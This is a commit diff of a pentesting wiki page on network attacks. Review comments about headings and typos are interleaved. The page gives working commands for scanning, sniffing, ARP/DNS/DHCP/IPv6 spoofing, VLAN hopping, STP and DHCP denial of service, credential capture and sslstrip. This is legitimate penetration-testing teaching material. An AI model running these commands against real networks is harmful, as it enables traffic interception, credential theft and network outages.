GitBook: [#3168] No subject

This commit is contained in:
CPol 2022-05-01 23:58:57 +00:00 committed by gitbook-bot
parent ccc4364d34
commit 835bee0d5d
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 84 additions and 81 deletions


@ -18,7 +18,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (2).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
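Review bot: the two Intigriti lines in this hunk differ only in the trailing `\\`, so the change just drops a stray literal backslash; the `<img ...>` line still ends in a single `\`, which GitBook renders as a hard line break before the bold text, so the layout inside the hint is preserved. Since the sentence already links the same URL, the `{% embed url="https://go.intigriti.com/hacktricks" %}` below it is redundant, though harmless.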


@ -1,4 +1,4 @@
# Pentesting Network
<details>
@ -16,13 +16,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (2).png" alt="" data-size="original">****\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
# Discovering hosts from the outside
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## Discovering hosts from the outside
This is going to be a **brief section** about how to find **IPs responding** from the **Internet**.\
In this situation you have some **scope of IPs** (maybe even several **ranges**) and you just to find **which IPs are responding**.
## ICMP
### ICMP
This is the **easiest** and **fastest** way to discover if a host is up or not.\
You could try to send some **ICMP** packets and **expect responses**. The easiest way is just sending an **echo request** and expect from the response. You can do that using a simple `ping`or using `fping`for **ranges**.\
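Review bot: the old `# Discovering hosts from the outside` sat inside the `{% hint %}` block, between the Intigriti text and the `{% embed %}`; moving it after `{% endhint %}` as `## Discovering hosts from the outside` both keeps the hint well-formed and makes the section an H2 under the page's single `# Pentesting Network` H1, which is the pattern this commit applies to every heading below. Two leftovers in the same hunk: `****\` after the `<img ...>` tag is an empty bold pair that renders as nothing and should be dropped, and `you just to find **which IPs are responding**` is missing "want" (``ping`or`` and ``fping`for`` also need a space after the closing backtick).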
@ -34,7 +40,7 @@ fping -g 199.66.11.0/24 # Send echo requests to ranges
nmap -PEPM -sP -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests
```
## TCP Port Discovery
### TCP Port Discovery
It's very common to find that all kind of ICMP packets are being filtered. Then, all you can do to check if a host is up is **try to find open ports**. Each host has **65535 ports**, so, if you have a "big" scope you **cannot** test if **each port** of each host is open or not, that will take too much time.\
Then, what you need is a **fast port scanner** ([masscan](https://github.com/robertdavidgraham/masscan)) and a list of the **ports more used:**
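Review bot: in `nmap -PEPM -sP -n 199.66.11.0/24`, `-sP` is the deprecated alias of `-sn` (ping scan, no port scan) and current nmap prints a warning for it, so `-sn` is the better spelling. Wording: `all kind of ICMP packets are being filtered` → "all kinds of ICMP packets".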
@ -46,7 +52,7 @@ masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5
You could also perform this step with `nmap`, but it slower and somewhat `nmap`has problems identifying hosts up.
## HTTP Port Discovery
### HTTP Port Discovery
This is just a TCP port discovery useful when you want to **focus on discovering HTTP** **services**:
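Review bot: `it slower and somewhat `nmap`has problems` is missing a verb and a space; suggest "it is slower and `nmap` sometimes has problems identifying live hosts".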
@ -54,7 +60,7 @@ This is just a TCP port discovery useful when you want to **focus on discovering
masscan -p80,443,8000-8100,8443 199.66.11.0/24
```
## UDP Port Discovery
### UDP Port Discovery
You could also try to check for some **UDP port open** to decide if you should **pay more attention** to a **host.** As UDP services usually **don't respond** with **any data** to a regular empty UDP probe packet it is difficult to say if a port is being filtered or open. The easiest way to decide this is to send a packet related to the running service, and as you don't know which service is running, you should try the most probable based on the port number:
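Review bot: `**host.** As UDP services` puts the period inside the bold; write `**host**.` so the sentence break renders cleanly. The reasoning is sound and worth keeping: an empty UDP probe to an open port gets no reply, which is indistinguishable from a filtered port, hence the need for service-specific payloads.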
@ -66,14 +72,14 @@ nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
The nmap line proposed before will test the **top 1000 UDP ports** in every host inside the **/24** range but even only this will take **>20min**. If need **fastest results** you can use [**udp-proto-scanner**](https://github.com/portcullislabs/udp-proto-scanner): `./udp-proto-scanner.pl 199.66.11.53/24` This will send these **UDP probes** to their **expected port** (for a /24 range this will just take 1 min): _DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp._
## SCTP Port Discovery
### SCTP Port Discovery
```bash
#Probably useless, but it's pretty fast, why not trying?
nmap -T4 -sY -n --open -Pn <IP/range>
```
# Pentesting Wifi
## Pentesting Wifi
Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:
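Review bot: `If need **fastest results**` → "If you need faster results"; in the SCTP fence `why not trying?` → "why not try it?". `199.66.11.53/24` writes the range with host bits set; nmap accepts it, but `199.66.11.0/24`, as used in the earlier examples, avoids confusion about what is scanned.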
@ -81,11 +87,11 @@ Here you can find a nice guide of all the well known Wifi attacks at the time of
[pentesting-wifi](../pentesting-wifi/)
{% endcontent-ref %}
# Discovering hosts from the inside
## Discovering hosts from the inside
If you are inside the network one of the first things you will want to do is to **discover other hosts**. Depending on **how much noise** you can/want to do, different actions could be performed:
## Passive
### Passive
You can use these tools to passively discover hosts inside a connected network:
@ -98,7 +104,7 @@ net.show
set net.show.meta true #more info
```
## Active
### Active
Note that the techniques commented in [_**Discovering hosts from the outside**_](./#discovering-hosts-from-the-outside) (_TCP/HTTP/UDP/SCTP Port Discovery_) can be also **applied here**.\
But, as you are in the **same network** as the other hosts, you can do **more things**:
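Review bot: `can be also **applied here**` → "can also be applied here" (the same phrase recurs in the next hunk). The `./#discovering-hosts-from-the-outside` anchor still resolves after the heading is demoted from `#` to `##`, because the slug is derived from the heading text, not its level.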
@ -123,7 +129,7 @@ net.probe.throttle 10 #10ms between requests sent (Discover local)
alive6 <IFACE> # Send a pingv6 to multicast.
```
## Active ICMP
### Active ICMP
Note that the techniques commented in _Discovering hosts from the outside_ ([_**ICMP**_](./#icmp)) can be also **applied here**.\
But, as you are in the **same network** as the other hosts, you can do **more things**:
@ -132,7 +138,7 @@ But, as you are in the **same network** as the other hosts, you can do **more th
* Pinging the **network broadcast address** you could even find hosts inside **other subnets**: `ping -b 255.255.255.255`
* Use the `-PEPM` flag of `nmap`to perform host discovery sending **ICMPv4 echo**, **timestamp**, and **subnet mask requests:** `nmap -PEPM -sP vvv -n 10.12.5.0/24`
## **Wake On Lan**
### **Wake On Lan**
Wake On Lan is used to **turn on** computers through a **network message**. The magic packet used to turn on the computer is only a packet where a **MAC Dst** is provided and then it is **repeated 16 times** inside the same paket.\
Then this kind of packets are usually sent in an **ethernet 0x0842** or in a **UDP packet to port 9**.\
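Review bot: `nmap -PEPM -sP vvv -n 10.12.5.0/24` has lost the dash on `vvv`; as written nmap treats `vvv` as a hostname target, so it should be `-vvv` (and `-sP` is the deprecated alias of `-sn`). Also ``nmap`to`` needs a space, `paket` → "packet", and `Then this kind of packets are usually sent` → "These packets are usually sent". One caveat for the broadcast bullet: `255.255.255.255` is the limited broadcast, which routers never forward, so that ping only reaches the local segment; only a directed broadcast to another subnet's broadcast address could cross a router, and most routers drop those as well.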
@ -145,11 +151,11 @@ wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9
# Bettercap2 can also be used for this purpose
```
# Scanning Hosts
## Scanning Hosts
Once you have discovered all the IPs (external or internal) you want to scan in depth, different actions can be performed.
## TCP
### TCP
* **Open** port: _SYN --> SYN/ACK --> RST_
* **Closed** port: _SYN --> RST/ACK_
@ -168,7 +174,7 @@ nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000
```
## UDP
### UDP
There are 2 options to scan an UDP port:
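Review bot: `scan an UDP port` → "scan a UDP port".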
@ -189,7 +195,7 @@ nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time
```
## SCTP Scan
### SCTP Scan
SCTP sits alongside TCP and UDP. Intended to provide **transport** of **telephony** data over **IP**, the protocol duplicates many of the reliability features of Signaling System 7 (SS7), and underpins a larger protocol family known as SIGTRAN. SCTP is supported by operating systems including IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, and VxWorks.
@ -202,19 +208,19 @@ nmap -T4 -sY -n -oA SCTFastScan <IP>
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>
```
## IDS and IPS evasion
### IDS and IPS evasion
{% content-ref url="ids-evasion.md" %}
[ids-evasion.md](ids-evasion.md)
{% endcontent-ref %}
## **More nmap options**
### **More nmap options**
{% content-ref url="nmap-summary-esp.md" %}
[nmap-summary-esp.md](nmap-summary-esp.md)
{% endcontent-ref %}
## Revealing Internal IP Addresses
### Revealing Internal IP Addresses
Misconfigured routers, firewalls, and network devices sometimes **respond** to network probes **using nonpublic source addresses**. You can use _tcpdump_ used to **identify packets** received from **private addresses** during testing. In this case, the _eth2_ interface in Kali Linux is **addressable** from the **public Internet** (If you are **behind** a **NAT** of a **Firewall** this kind of packets are probably going to be **filtered**).
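Review bot: `nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>` combines `-p-` (all 65535 ports) with `-F` (fast mode, top 100 ports), which contradict each other; for an "all" scan keep `-p-` and drop `-F`. The output names `SCTFastScan`/`SCTAllScan` look like typos for `SCTP...`. In the prose, `You can use _tcpdump_ used to` repeats "used", and `behind a **NAT** of a **Firewall**` → "or a Firewall".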
@ -226,13 +232,13 @@ IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64
```
# Sniffing
## Sniffing
Sniffing you can learn details of IP ranges, subnet sizes, MAC addresses, and hostnames by reviewing captured frames and packets. If the network is misconfigured or switching fabric under stress, attackers can capture sensitive material via passive network sniffing.
If a switched Ethernet network is configured properly, you will only see broadcast frames and material destined for your MAC address.
## TCPDump
### TCPDump
```bash
sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
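Review bot: `Sniffing you can learn details` lacks a subject; suggest "By sniffing you can learn details". `switching fabric under stress` → "the switching fabric is under stress". The tcpdump comment `discover what is searching the host` reads backwards; it should say "discover what the host is looking up".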
@ -240,7 +246,7 @@ tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"
```
## Bettercap2
### Bettercap2
```bash
net.sniff on
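Review bot: `sudo bash -c "sudo nohup tcpdump ..."` invokes sudo twice; the outer `sudo bash -c` already runs the inner command as root, so the inner `sudo` is redundant. `-G 300 -W 50` rotates the capture every 5 minutes and keeps at most 50 files, a sensible bounded capture that deserves a comment, since the flags are not self-explanatory.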
@ -251,21 +257,21 @@ net.sniff.filter
net.sniff.regexp
```
## Wireshark
### Wireshark
Obviously.
## Capturing credentials
### Capturing credentials
You can us tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface.
# LAN attacks
## LAN attacks
## ARP spoofing
### ARP spoofing
ARP Spoofing consist on sending gratuitous ARPResponses to indicate that the IP of a machine has the MAC of our device. Then, the victim will change the ARP table and will contact our machine every time it wants to contact the IP spoofed.
### **Bettercap2**
#### **Bettercap2**
```bash
arp.spoof on
@ -275,7 +281,7 @@ arp.spoof.whitelist
arp.spoof.internal #Spoofed local connections (by default only Victim <--> Gateway
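Review bot: `You can us tools` → "use"; `ARP Spoofing consist on sending gratuitous ARPResponses` → "ARP spoofing consists of sending gratuitous ARP responses". The comment on `arp.spoof.internal` has an unclosed parenthesis: `(by default only Victim <--> Gateway` needs a closing `)`.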
```
### **Arpspoof**
#### **Arpspoof**
```bash
echo 1 > /proc/sys/net/ipv4/ip_forward
@ -283,7 +289,7 @@ arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1
```
## MAC Flooding - CAM overflow
### MAC Flooding - CAM overflow
Overflow the switchs CAM table sending a lot of packets with different source mac address. When the CAM table is full the switch start behaving like a hub (broadcasting all the traffic).
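Review bot: `Overflow the switchs CAM table` → "switch's"; `the switch start behaving` → "starts behaving". `echo 1 > /proc/sys/net/ipv4/ip_forward` only works from a root shell, because with plain `sudo` the redirect is performed by the unprivileged shell; `sysctl -w net.ipv4.ip_forward=1` is the form that works in both cases.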
@ -293,9 +299,9 @@ macof -i <interface>
In modern switches this vulnerability has been fixed.
## 802.1Q VLAN
### 802.1Q VLAN
### Dynamic Trunking
#### Dynamic Trunking
Many switches support the Dynamic Trunking Protocol (DTP) by default, however, which an adversary can abuse to **emulate a switch and receive traffic across all VLANs**. The tool [_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan) can sniff an interface and **reports if switch is in Default mode, trunk, dynamic, auto or access mode** (this is the only one that would avoid VLAN hopping). The tool will indicate if the switch is vulnerable or not.
@ -316,7 +322,7 @@ yersinia -G #For graphic mode
To access the VLAN packets
### Attacking specific VLANs
#### Attacking specific VLANs
Once you known VLAN IDs and IPs values, you can **configure a virtual interface to attack a specific VLAN**.\
If DHCP is not available, then use _ifconfig_ to set a static IP address.
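Review bot: `In modern switches this vulnerability has been fixed.` is too vague to act on: what blunts CAM overflow is port security (a per-port limit on learned MAC addresses), which is a configuration option rather than a property of newer hardware, so the reader should check whether it is enabled. Wording: `Many switches support ... by default, however, which an adversary` drops "however"; `reports if switch is in` → "reports whether the switch is in"; `Once you known VLAN IDs and IPs values` → "Once you know the VLAN IDs and IP values".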
@ -347,11 +353,11 @@ vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up
```
### Automatic VLAN Hopper
#### Automatic VLAN Hopper
The discussed attack of **Dynamic Trunking and creating virtual interfaces an discovering hosts inside** other VLANs are **automatically performed** by the tool: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger)
### Double Tagging
#### Double Tagging
If an attacker knows the value of the **MAC, IP and VLAN ID of the victim host**, he could try to **double tag a frame** with its designated VLAN and the VLAN of the victim and send a packet. As the **victim won't be able to connect back** with the attacker, so the **best option for the attacker is communicate via UDP** to protocols that can perform some interesting actions (like SNMP).
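Review bot: `vconfig add eth1 20` uses the legacy tool, which has been deprecated in favour of iproute2; the current equivalent is `ip link add link eth1 name eth1.20 type vlan id 20`, then `ip addr add 192.168.1.2/24 dev eth1.20` and `ip link set eth1.20 up`. Wording: `an discovering hosts` → "and discovering hosts"; `As the victim won't be able to connect back with the attacker, so the best option` drops the "so"; `is communicate via UDP` → "is to communicate via UDP".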
@ -368,17 +374,17 @@ packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)
```
### Layer 3 Private VLAN Bypass
#### Layer 3 Private VLAN Bypass
In guest wireless networks and other environments, private VLAN (also known as _port isolation_) settings are used to **prevent peers from interacting** (i.e., clients **connect to a wireless access point but cannot address one another**). Depending on network ACLs (or lack thereof), it might be possible to send IP packets up to a router, which are then forwarded back to a neighbouring peer.
This attack will send a **specially crafted packet to the IP of a client but with the MAC of the router**. Then, the **router will redirect the packet to the client**. As in _Double Tagging Attacks_ you can exploit this vulnerability by controlling a host accessible by the victim.
## STP Attacks
### STP Attacks
**If you cannot capture BPDU frames on your interfaces, it is unlikely that you will succeed in an STP attack.**
### **STP BPDU DoS**
#### **STP BPDU DoS**
Sending a lot of BPDUs TCP (Topology Change Notification) or Conf (the BPDUs that are sent when the topology is created) the switches are overloaded and stop working correctly.
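Review bot: `BPDUs TCP (Topology Change Notification)` uses the wrong acronym; a Topology Change Notification BPDU is a TCN, and "TCP" collides with the transport protocol (the same slip appears in the `STP TCP Attack` heading of the next hunk). `the switches are overloaded and stop working correctly` → "the switches get overloaded and stop working correctly".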
@ -388,7 +394,7 @@ yersinia stp -attack 3
#Use -M to disable MAC spoofing
```
### **STP TCP Attack**
#### **STP TCP Attack**
When a TCP is sent, the CAM table of the switches will be deleted in 15s. Then, if you are sending continuously this kind of packets, the CAM table will be restarted continuously (or every 15segs) and when it is restarted, the switch behaves as a hub
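Review bot: `When a TCP is sent` → "When a TCN (Topology Change Notification) is sent"; `15segs` → "15 s"; `the CAM table will be restarted continuously (or every 15segs)` → "the CAM table will be flushed every 15 s". The mechanism described is right: a TCN makes the switches shorten their MAC-table aging time to the forward delay, so entries expire quickly and unknown-unicast traffic is flooded.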
@ -397,7 +403,7 @@ yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen
```
### **STP Root Attack**
#### **STP Root Attack**
The attacker simulates the behaviour of a switch to become the STP root of the network. Then, more data will pass through him. This is interesting when you are connected to two different switches.\
This is done by sending BPDUs CONF packets saying that the **priority** value is less than the actual priority of the actual root switch.
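Review bot: `more data will pass through him` → "through it"; `sending BPDUs CONF packets saying that the **priority** value is less than the actual priority of the actual root switch` → "sending configuration BPDUs that advertise a bridge priority lower than that of the current root switch".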
@ -414,7 +420,7 @@ yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be for
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages
```
## CDP Attacks
### CDP Attacks
CISCO Discovery Protocol is the protocol used by CISCO devices to talk among them, **discover who is alive** and what features does they have. You can make a DoS attack to a CISCO switch by exhausting the device memory simulating real CISCO devices.
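Review bot: the ettercap comment `forwardpackages` → "forward packets"; `talk among them` → "talk to each other"; `what features does they have` → "what features they have".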
@ -428,7 +434,7 @@ sudo yersinia cdp -attack 0 #Send a CDP packet
You could also use [scapy](https://github.com/secdev/scapy/). Be sure to install it with `scapy/contrib` package.
### VoIP Attacks
#### VoIP Attacks
Although intended for use by the employees Voice over Internet Protocol (VoIP) phones, modern VoIP devices are increasingly integrated with IoT devices. Many employees can now unlock doors using a special phone number, control the rooms thermostat...
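Review bot: `Although intended for use by the employees Voice over Internet Protocol (VoIP) phones` is garbled; suggest "Although intended for employees' Voice over Internet Protocol (VoIP) phones". `rooms thermostat` → "room's thermostat".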
@ -444,9 +450,9 @@ voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2
If the tool executes successfully, the **VLAN network will assign an IPv4 address to the attackers device**.
## DHCP
### DHCP
### Enumeration
#### Enumeration
```bash
nmap --script broadcast-dhcp-discover
@ -482,7 +488,7 @@ A more automatic way of doing this is using the tool [DHCPing](https://github.co
You could use the mentioned DoS attacks to force clients to obtain new leases within the environment, and exhaust legitimate servers so that they become unresponsive. So when the legitimate try to reconnect, **you can server malicious values mentioned in the next attack**.
### Set malicious values
#### Set malicious values
You can use Responder DHCP script (_/usr/share/responder/DHCP.py_) to establish a rogue DHCP server. Setting a malicious gateway is not ideal, because the hijacked connection is only half-duplex (i.e., we capture egress packets from the client, but not the responses from the legitimate gateway). As such, I would recommend setting a rogue DNS or WPAD server to capture HTTP traffic and credentials in particular.
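Review bot: `you can server malicious values` → "serve"; `when the legitimate try to reconnect` → "when legitimate clients try to reconnect". The half-duplex caveat about a spoofed gateway is correct and worth keeping: only client-to-gateway traffic passes the attacker, while the legitimate gateway's replies take the real path.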
@ -499,7 +505,7 @@ You can use Responder DHCP script (_/usr/share/responder/DHCP.py_) to establish
| Spoof the default gateway IP address | -S |
| Respond to all DHCP requests (very noisy) | -R |
## **EAP**
### **EAP**
Here are some of the attack tactics that can be used against 802.1X implementations:
@ -515,7 +521,7 @@ If the attacker if between the victim and the authentication server, he could tr
eapmd5pass r pcap.dump w /usr/share/wordlist/sqlmap.txt
```
## HSRP AND VRRP
### HSRP AND VRRP
Hot Standby Routing Protocol (HSRP) and the Virtual Router Redundancy Protocol (VRRP) are used in high-availability environments to provide failover support. Routers send packets to local multicast groups announcing configuration and priority details.
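Review bot: `eapmd5pass r pcap.dump w /usr/share/wordlist/sqlmap.txt` has lost the dashes on its options; it should read `eapmd5pass -r pcap.dump -w /usr/share/wordlist/sqlmap.txt`. `If the attacker if between` → "is between".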
@ -523,19 +529,19 @@ HSRP is a proprietary Cisco protocol with no RFC, whereas VRRP is standardized.
For more information about how to attack this protocols go to the book _**Network Security Assessment: Know Your Network (3rd edition)**_
## RIP
### RIP
Three versions of the Routing Information Protocol (RIP) exist—RIP, RIPv2, and RIPng. RIP and RIPv2 use UDP datagrams sent to peers via port 520, whereas RIPng broadcasts datagrams to UDP port 521 via IPv6 multicast. RIPv2 introduced MD5 authentication support. RIPng does not incorporate native authentication; rather, it relies on optional IPsec AH and ESP headers within IPv6.
For more information about how to attack this protocol go to the book _**Network Security Assessment: Know Your Network (3rd edition).**_
### EIGRP
#### EIGRP
The Enhanced Interior Gateway Routing Protocol (EIGRP) is Cisco proprietary and can be run with or without authentication. \_\_[Coly](https://code.google.com/p/coly/) supports capture of EIGRP broadcasts and injection of packets to manipulate routing configuration.
For more information about how to attack this protocol go to the book _**Network Security Assessment: Know Your Network (3rd edition).**_
## OSPF
### OSPF
Most Open Shortest Path First (OSPF) implementations use MD5 to provide authentication between routers. Loki and John the Ripper can capture and attack MD5 hashes to reveal the key, which can then be used to advertise new routes. The route parameters are set by using the _Injection_ tab, and the key set under _Connection_.
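Review bot: `\_\_[Coly](https://code.google.com/p/coly/)` carries stray escaped underscores before the link, a Markdown-escaping leftover; drop `\_\_`. `how to attack this protocols` → "these protocols". `RIPng broadcasts datagrams to UDP port 521 via IPv6 multicast` mixes broadcast and multicast; "sends datagrams" is accurate.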
@ -545,7 +551,7 @@ For more information about how to attack this protocol go to the book _**Network
You can find some more information about network attacks [here](https://github.com/Sab0tag3d/MITM-cheatsheet). _\*\*(TODO: Read it all and all new attacks if any)_
# **Spoofing**
## **Spoofing**
The attacker configures all the network parameters (GW, IP, DNS) of the new member of the network sending fake DHCP responses.
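Review bot: `_\*\*(TODO: Read it all and all new attacks if any)_` is an escaping artifact (`\*\*` inside italics); either make it a plain parenthetical or remove the TODO before publishing.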
@ -554,11 +560,11 @@ Ettercap
yersinia dhcp -attack 2 #More parameters are needed
```
## ARP Spoofing
### ARP Spoofing
Check the [previous section](./#arp-spoofing).
## ICMPRedirect
### ICMPRedirect
ICMP Redirect consist on sending an ICMP packet type 1 code 5 that indicates that the attacker is the best way to reach an IP. Then, when the victim wants to contact the IP, it will send the packet through the attacker.
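Review bot: `ICMP packet type 1 code 5` has the numbers swapped: ICMP Redirect is type 5, and code 1 is "redirect for host", which matches the `-C 5 -K 1` used by the hping3 line in the next hunk. `ICMP Redirect consist on sending` → "consists of sending".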
@ -568,7 +574,7 @@ icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]
```
## DNS Spoofing
### DNS Spoofing
The attacker will resolve some (or all) the domains that the victim ask for.
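Review bot: in the hping3 comment `form [2]` → "from [2]"; `the domains that the victim ask for` → "asks for".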
@ -583,7 +589,7 @@ apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dn
dig @localhost domain.example.com # Test the configured DNS
```
## Local Gateways
### Local Gateways
Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use _gateway-finder.py_ to identify hosts that support IPv4 forwarding.
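Review bot: `apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf` runs two commands together; a newline (or `;`) is missing between `dnsmasq` and `echo`, otherwise apt tries to install a package called `dnsmasqecho` and the config file is never written.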
@ -605,14 +611,14 @@ gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
```
## [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
Microsoft systems use Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS) for local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementations use Multicast DNS (mDNS) to discover systems within a network. These protocols are unauthenticated and broadcast messages over UDP; thus, attackers can exploit them to direct users to malicious services.
You can impersonate services that are searched by hosts using Responder to send fake responses.\
Read here more information about [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
## [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
Many browsers use Web Proxy Auto-Discovery (WPAD) to load proxy settings from the network. A WPAD server provides client proxy settings via a particular URL (e.g., [http://wpad.example.org/wpad.dat](http://wpad.example.org/wpad.dat)) upon being identified through any of the following:
@ -623,11 +629,11 @@ Many browsers use Web Proxy Auto-Discovery (WPAD) to load proxy settings from th
Responder automates the WPAD attack—running a proxy and directing clients to a malicious WPAD server via DHCP, DNS, LLMNR, and NBT-NS.\
Read here more information about [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
## [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md)
### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md)
You can offer different services in the network to try to **trick a user** to enter some **plain-text credentials**. **More information about this attack in** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.**
## IPv6 Neighbor Spoofing
### IPv6 Neighbor Spoofing
This attack is very similar to ARP Spoofing but in the IPv6 world. You can get the victim think that the IPv6 of the GW has the MAC of the attacker.
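Review bot: `You can get the victim think` → "make the victim think".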
@ -636,7 +642,7 @@ sudo parasite6 -l eth0 # This option will respond to every requests spoofing the
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds
```
## IPv6 Router Advertisement Spoofing/Flooding
### IPv6 Router Advertisement Spoofing/Flooding
Some OS configure by default the gateway from the RA packets sent in the network. To declare the attacker as IPv6 router you can use:
@ -646,7 +652,7 @@ ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16
```
## IPv6 DHCP spoofing
### IPv6 DHCP spoofing
By default some OS try to configure the DNS reading a DHCPv6 packet in the network. Then, an attacker could send a DHCPv6 packet to configure himself as DNS. The DHCP also provides an IPv6 to the victim.
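Review bot: `configure himself as DNS` → "itself as the DNS server"; `provides an IPv6 to the victim` → "an IPv6 address".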
@ -657,11 +663,11 @@ dhcp6.spoof.domains <list of domains>
mitm6
```
## HTTP (fake page and JS code injection)
### HTTP (fake page and JS code injection)
# Internet Attacks
## Internet Attacks
## sslStrip
### sslStrip
Basically what this attack does is, in case the **user** try to **access** a **HTTP** page that is **redirecting** to the **HTTPS** version. **sslStrip** will **maintain** a **HTTP connection with** the **client and** a **HTTPS connection with** the **server** so it ill be able to **sniff** the connection in **plain text**.
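Review bot: the new `### HTTP (fake page and JS code injection)` heading has no body and is immediately followed by `## Internet Attacks`; either add content under it or drop it. `in case the **user** try to **access**` → "tries to access"; `so it ill be able` → "will".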
@ -676,7 +682,7 @@ iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT
More info [here](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf).
## sslStrip+ and dns2proxy for bypassing HSTS
### sslStrip+ and dns2proxy for bypassing HSTS
The **difference** between **sslStrip+ and dns2proxy** against **sslStrip** is that they will **redirect** for example _**www.facebook.com**_ **to** _**wwww.facebook.com**_ (note the **extra** "**w**") and will set the **address of this domain as the attacker IP**. This way, the **client** will **connect** to _**wwww.facebook.com**_ **(the attacker)** but behind the scenes **sslstrip+** will **maintain** the **real connection** via https with **www.facebook.com**.
@ -689,16 +695,16 @@ More info [here](https://www.bettercap.org/legacy/#hsts-bypass), [here](https://
TODO: easy-creds, evilgrade, metasploit, factory
# TCP listen in port
## TCP listen in port
```
sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -
```
# TCP + SSL listen in port
## TCP + SSL listen in port
### Generate keys and self-signed certificate
#### Generate keys and self-signed certificate
```
FILENAME=server
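Review bot: the `TCP listen in port` and `Generate keys` fences are untagged while the rest of the page uses ```bash; tag them for consistent highlighting. `TODO: easy-creds, evilgrade, metasploit, factory` is a leftover author note. "Listen on a port" reads better than "listen in port" in both headings.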
@ -710,13 +716,13 @@ openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem
```
